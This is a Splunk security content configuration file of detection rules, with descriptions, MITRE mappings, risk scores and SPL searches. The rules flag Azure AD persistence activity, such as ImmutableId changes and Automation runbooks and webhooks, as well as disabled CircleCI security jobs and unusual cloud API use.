action.notable.param.rule_title = Azure AD User Enabled And Password Reset action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` (operationName="Enable account" OR operationName="Reset password (by admin)" OR operationName="Update user") | transaction user startsWith=(operationName="Enable account") endsWith=(operationName="Reset password (by admin)") maxspan=2m | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime values(operationName) as operationName values(initiatedBy) as initiatedBy by user, result | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_user_enabled_and_password_reset_filter` [ESCU - Azure AD User ImmutableId Attribute Updated - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the modification of the SourceAnchor (also called ImmutableId) attribute for an Azure Active Directory user. Updating this attribute is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. 
An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the modification of the SourceAnchor (also called ImmutableId) attribute for an Azure Active Directory user. Updating this attribute is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. 
action.escu.known_false_positives = The SourceAnchor (also called ImmutableId) Azure AD attribute has legitimate uses for directory synchronization. Investigate and filter as needed. action.escu.creation_date = 2022-09-02 action.escu.modification_date = 2022-09-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD User ImmutableId Attribute Updated - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = The SourceAnchor or ImmutableID attribute has been modified for user $user$ by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD User ImmutableId Attribute Updated - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the modification of the SourceAnchor (also called ImmutableId) attribute for an Azure Active Directory user. Updating this attribute is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. 
Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.notable.param.rule_title = Azure AD User ImmutableId Attribute Updated action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Update user" properties.targetResources{}.modifiedProperties{}.displayName=SourceAnchor | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.modifiedProperties{}.newValue as modifiedProperties | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user values(modifiedProperties) as modifiedProperties by initiatedBy, src_ip, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_user_immutableid_attribute_updated_filter` [ESCU - Azure Automation Account Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the creation of a new Azure Automation account within an Azure tenant. 
Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure using PowerShell and Python. Azure Automation can also be configured to automate tasks on on premise infrastructure using a component called a Hybrid Runbook Worker. Automation accounts serve as a container to isolate Automation resources, runbooks, assets, and configurations from the resources of other accounts. They allow administrators to separate resources into logical environments or delegated responsibilities. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation account with elevated privileges to maintain persistence in the Azure tenant. A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136", "T1136.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the creation of a new Azure Automation account within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure using PowerShell and Python. Azure Automation can also be configured to automate tasks on on premise infrastructure using a component called a Hybrid Runbook Worker. Automation accounts serve as a container to isolate Automation resources, runbooks, assets, and configurations from the resources of other accounts. They allow administrators to separate resources into logical environments or delegated responsibilities. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation account with elevated privileges to maintain persistence in the Azure tenant. 
A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Audit events into your Splunk environment. Specifically, this analytic leverages the Azure Activity log category. action.escu.known_false_positives = Administrators may legitimately create Azure Automation accounts. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure Automation Account Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new Azure Automation account $object$ was created by $user$ action.risk.param._risk = [{"risk_object_field": "object", "risk_object_type": "other", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure Automation Account Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136", "T1136.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the creation of a new Azure Automation 
account within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure using PowerShell and Python. Azure Automation can also be configured to automate tasks on on premise infrastructure using a component called a Hybrid Runbook Worker. Automation accounts serve as a container to isolate Automation resources, runbooks, assets, and configurations from the resources of other accounts. They allow administrators to separate resources into logical environments or delegated responsibilities. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation account with elevated privileges to maintain persistence in the Azure tenant. A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.notable.param.rule_title = Azure Automation Account Created action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_audit` operationName.localizedValue="Create or Update an Azure Automation account" status.value=Succeeded | dedup object | rename claims.ipaddr as src_ip | rename caller as user | stats count min(_time) as firstTime max(_time) as lastTime values(object) as object by user, src_ip, resourceGroupName, object_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_automation_account_created_filter` [ESCU - Azure Automation Runbook Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the creation of a new Azure Automation Runbook within an Azure tenant. 
Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation Runbook that runs with elevated privileges to maintain persistence in the Azure tenant. A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136", "T1136.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the creation of a new Azure Automation Runbook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation Runbook that runs with elevated privileges to maintain persistence in the Azure tenant. A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Audit events into your Splunk environment. Specifically, this analytic leverages the Azure Activity log category. action.escu.known_false_positives = Administrators may legitimately create Azure Automation Runbooks. Filter as needed. 
action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure Automation Runbook Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new Azure Automation Runbook $object$ was created by $caller$ action.risk.param._risk = [{"risk_object_field": "object", "risk_object_type": "other", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure Automation Runbook Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136", "T1136.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the creation of a new Azure Automation Runbook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation Runbook that runs with elevated privileges to maintain persistence in the Azure tenant. 
A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.notable.param.rule_title = Azure Automation Runbook Created action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_audit` operationName.localizedValue="Create or Update an Azure Automation Runbook" object!=AzureAutomationTutorial* status.value=Succeeded | dedup object | rename claims.ipaddr as src_ip | rename caller as user | stats count min(_time) as firstTime max(_time) as lastTime values(object) as object by user, src_ip, resourceGroupName, object_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_automation_runbook_created_filter` [ESCU - Azure Runbook Webhook Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the creation of a new Automation Runbook Webhook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. One of the ways administrators can configure a Runbook to be executed is through HTTP Webhooks. Webhooks leverage custom unauthenticated URLs that are exposed to the Internet. An adversary who has obtained privileged access to an Azure tenant may create a Webhook to trigger the execution of an Automation Runbook with malicious code that can create users or execute code on a VM. This provides a persistent foothold on the environment. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the creation of a new Automation Runbook Webhook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. One of the ways administrators can configure a Runbook to be executed is through HTTP Webhooks. Webhooks leverage custom unauthenticated URLs that are exposed to the Internet. An adversary who has obtained privileged access to an Azure tenant may create a Webhook to trigger the execution of an Automation Runbook with malicious code that can create users or execute code on a VM. This provides a persistent foothold on the environment. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Audit events into your Splunk environment. Specifically, this analytic leverages the Azure Activity log category. action.escu.known_false_positives = Administrators may legitimately create Azure Runbook Webhooks. Filter as needed. 
action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure Runbook Webhook Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new Azure Runbook Webhook $object$ was created by $caller$ action.risk.param._risk = [{"risk_object_field": "object", "risk_object_type": "other", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure Runbook Webhook Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the creation of a new Automation Runbook Webhook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. One of the ways administrators can configure a Runbook to be executed is through HTTP Webhooks. Webhooks leverage custom unauthenticated URLs that are exposed to the Internet. 
An adversary who has obtained privileged access to an Azure tenant may create a Webhook to trigger the execution of an Automation Runbook with malicious code that can create users or execute code on a VM. This provides a persistent foothold on the environment. action.notable.param.rule_title = Azure Runbook Webhook Created action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_audit` operationName.localizedValue="Create or Update an Azure Automation webhook" status.value=Succeeded | dedup object | rename claims.ipaddr as src_ip | rename caller as user | stats count min(_time) as firstTime max(_time) as lastTime values(object) as object by user, src_ip, resourceGroupName, object_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_runbook_webhook_created_filter` [ESCU - Circle CI Disable Security Job - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic searches for a specific behavior in CircleCI pipelines such as the disabling of security jobs. The detection is made by using a Splunk query that renames certain fields and retrieves values for specified job names, workflow IDs and names, user information, commit messages, URLs, and branches. Then, the query identifies mandatory jobs for each workflow and searches for instances where they were run. The search also identifies the phase of the pipeline as "build" and extracts the repository name from the URL using regular expressions. The detection is important because it detects attempts to bypass security measures in CircleCI pipelines, which can potentially lead to malicious code being introduced into the pipeline, data breaches, system downtime, and reputational damage. 
False positives might occur since legitimate use cases can require the disabling of security jobs. However, you can proactively monitor and identify any suspicious activity in the pipeline using this analytic and mitigate potential threats through early detection. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1554"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic searches for a specific behavior in CircleCI pipelines such as the disabling of security jobs. The detection is made by using a Splunk query that renames certain fields and retrieves values for specified job names, workflow IDs and names, user information, commit messages, URLs, and branches. Then, the query identifies mandatory jobs for each workflow and searches for instances where they were run. The search also identifies the phase of the pipeline as "build" and extracts the repository name from the URL using regular expressions. The detection is important because it detects attempts to bypass security measures in CircleCI pipelines, which can potentially lead to malicious code being introduced into the pipeline, data breaches, system downtime, and reputational damage. False positives might occur since legitimate use cases can require the disabling of security jobs. However, you can proactively monitor and identify any suspicious activity in the pipeline using this analytic and mitigate potential threats through early detection. action.escu.how_to_implement = You must index CircleCI logs. 
action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-02 action.escu.modification_date = 2021-09-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Circle CI Disable Security Job - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = disable security job $mandatory_job$ in workflow $workflow_name$ from user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Circle CI Disable Security Job - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1554"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `circleci` | rename vcs.committer_name as user vcs.subject as commit_message vcs.url as url workflows.* as * | stats values(job_name) as job_names by workflow_id workflow_name user commit_message url branch | lookup mandatory_job_for_workflow workflow_name OUTPUTNEW job_name AS mandatory_job | search mandatory_job=* | eval mandatory_job_executed=if(like(job_names, "%".mandatory_job."%"), 1, 0) | where mandatory_job_executed=0 | eval phase="build" | rex field=url "(?[^\/]*\/[^\/]*)$" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `circle_ci_disable_security_job_filter` [ESCU - Circle CI 
Disable Security Step - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the disablement of security steps in a CircleCI pipeline. Addressing instances of security step disablement in CircleCI pipelines can mitigate the risks associated with potential security vulnerabilities and unauthorized changes. A proactive approach helps protect the organization's infrastructure, data, and overall security posture. The detection is made by a Splunk query that searches for specific criteria within CircleCI logs through a combination of field renaming, joining, and statistical analysis to identify instances where security steps are disabled. It retrieves information such as job IDs, job names, commit details, and user information from the CircleCI logs. The detection is important because it indicates potential security vulnerabilities or unauthorized changes to the pipeline caused by someone within the organization intentionally or unintentionally disabling security steps in the CircleCI pipeline.Disabling security steps can leave the pipeline and the associated infrastructure exposed to potential attacks, data breaches, or the introduction of malicious code into the pipeline. Investigate by reviewing the job name, commit details, and user information associated with the disablement of security steps. You must also examine any relevant on-disk artifacts and identify concurrent processes that might indicate the source of the attack or unauthorized change. 
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1554"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects the disablement of security steps in a CircleCI pipeline. Addressing instances of security step disablement in CircleCI pipelines can mitigate the risks associated with potential security vulnerabilities and unauthorized changes. A proactive approach helps protect the organization's infrastructure, data, and overall security posture. The detection is made by a Splunk query that searches for specific criteria within CircleCI logs through a combination of field renaming, joining, and statistical analysis to identify instances where security steps are disabled. It retrieves information such as job IDs, job names, commit details, and user information from the CircleCI logs. The detection is important because it indicates potential security vulnerabilities or unauthorized changes to the pipeline caused by someone within the organization intentionally or unintentionally disabling security steps in the CircleCI pipeline. Disabling security steps can leave the pipeline and the associated infrastructure exposed to potential attacks, data breaches, or the introduction of malicious code into the pipeline. Investigate by reviewing the job name, commit details, and user information associated with the disablement of security steps. You must also examine any relevant on-disk artifacts and identify concurrent processes that might indicate the source of the attack or unauthorized change.
action.escu.how_to_implement = You must index CircleCI logs.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-09-01
action.escu.modification_date = 2021-09-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Circle CI Disable Security Step - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = disable security step $mandatory_step$ in job $job_name$ from user $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Circle CI Disable Security Step - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1554"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `circleci` | rename workflows.job_id AS job_id | join job_id [ | search `circleci` | stats values(name) as step_names count by job_id job_name ] | stats count by step_names job_id job_name vcs.committer_name vcs.subject vcs.url owners{} | rename vcs.* as * , owners{} as user | lookup mandatory_step_for_job job_name OUTPUTNEW step_name AS mandatory_step | search mandatory_step=* | eval mandatory_step_executed=if(like(step_names, "%".mandatory_step."%"), 1, 0) | where mandatory_step_executed=0 | rex field=url "(?<repo>[^\/]*\/[^\/]*)$" | eval phase="build" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `circle_ci_disable_security_step_filter`

[ESCU - Cloud API Calls From Previously Unseen User Roles - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects when a new command is run by a user who typically does not run those commands. The detection is made by a Splunk query that searches for these commands in the Change data model. It identifies commands run by users with the user_type of AssumedRole and a status of success. The query retrieves the earliest and latest timestamps of each command run and groups the results by the user and command. Then, it drops the unnecessary data model object name and uses a lookup to verify whether the command was seen before. The lookup table contains information about previously seen cloud API calls for each user role, including the first time the command was seen and whether enough data is available for analysis. If the firstTimeSeenUserApiCall field is null or greater than the relative time of 24 hours ago, it indicates that the command is new and was not seen before. The final result table includes the firstTime, user, object, and command fields of the new commands. It also applies the security_content_ctime function to format the timestamps and applies a filter to remove any cloud API calls from previously unseen user roles. The detection is important because it helps to identify new commands run by different user roles. New commands can indicate potential malicious activity or unauthorized actions within the environment. Detecting and investigating these new commands can help identify and mitigate potential security threats earlier, preventing data breaches, unauthorized access, or other damaging outcomes.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = The following analytic detects when a new command is run by a user who typically does not run those commands. The detection is made by a Splunk query that searches for these commands in the Change data model. It identifies commands run by users with the user_type of AssumedRole and a status of success. The query retrieves the earliest and latest timestamps of each command run and groups the results by the user and command. Then, it drops the unnecessary data model object name and uses a lookup to verify whether the command was seen before. The lookup table contains information about previously seen cloud API calls for each user role, including the first time the command was seen and whether enough data is available for analysis. If the firstTimeSeenUserApiCall field is null or greater than the relative time of 24 hours ago, it indicates that the command is new and was not seen before. The final result table includes the firstTime, user, object, and command fields of the new commands. It also applies the security_content_ctime function to format the timestamps and applies a filter to remove any cloud API calls from previously unseen user roles. The detection is important because it helps to identify new commands run by different user roles. New commands can indicate potential malicious activity or unauthorized actions within the environment. Detecting and investigating these new commands can help identify and mitigate potential security threats earlier, preventing data breaches, unauthorized access, or other damaging outcomes.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud API Calls Per User Role - Initial` to build the initial table of user roles, commands, and times. You must also enable the second baseline search `Previously Seen Cloud API Calls Per User Role - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `cloud_api_calls_from_previously_unseen_user_roles_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_api_calls_from_previously_unseen_user_roles_filter`
action.escu.known_false_positives = .
action.escu.creation_date = 2020-09-04
action.escu.modification_date = 2020-09-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - Cloud API Calls From Previously Unseen User Roles - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious Cloud User Activities"]
action.risk = 1
action.risk.param._risk_message = User $user$ of type AssumedRole attempting to execute new API calls $command$ that have not been seen before
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Cloud API Calls From Previously Unseen User Roles - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where All_Changes.user_type=AssumedRole AND All_Changes.status=success by All_Changes.user, All_Changes.command All_Changes.object | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_api_calls_per_user_role user as user, command as command OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUserApiCall=min(firstTimeSeen) | where isnull(firstTimeSeenUserApiCall) OR firstTimeSeenUserApiCall > relative_time(now(),"-24h@h") | table firstTime, user, object, command | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cloud_api_calls_from_previously_unseen_user_roles_filter`

[ESCU - Cloud Compute Instance Created By Previously Unseen User - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for cloud compute instances created by users who have not created them before.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search looks for cloud compute instances created by users who have not created them before.
action.escu.how_to_implement = You must be ingesting the appropriate cloud-infrastructure logs. Run the "Previously Seen Cloud Compute Creations By User" support search to create a baseline of previously seen users.
action.escu.known_false_positives = It's possible that a user will start to create compute instances for the first time, for any number of reasons. Verify with the user launching instances that this is the intended behavior.
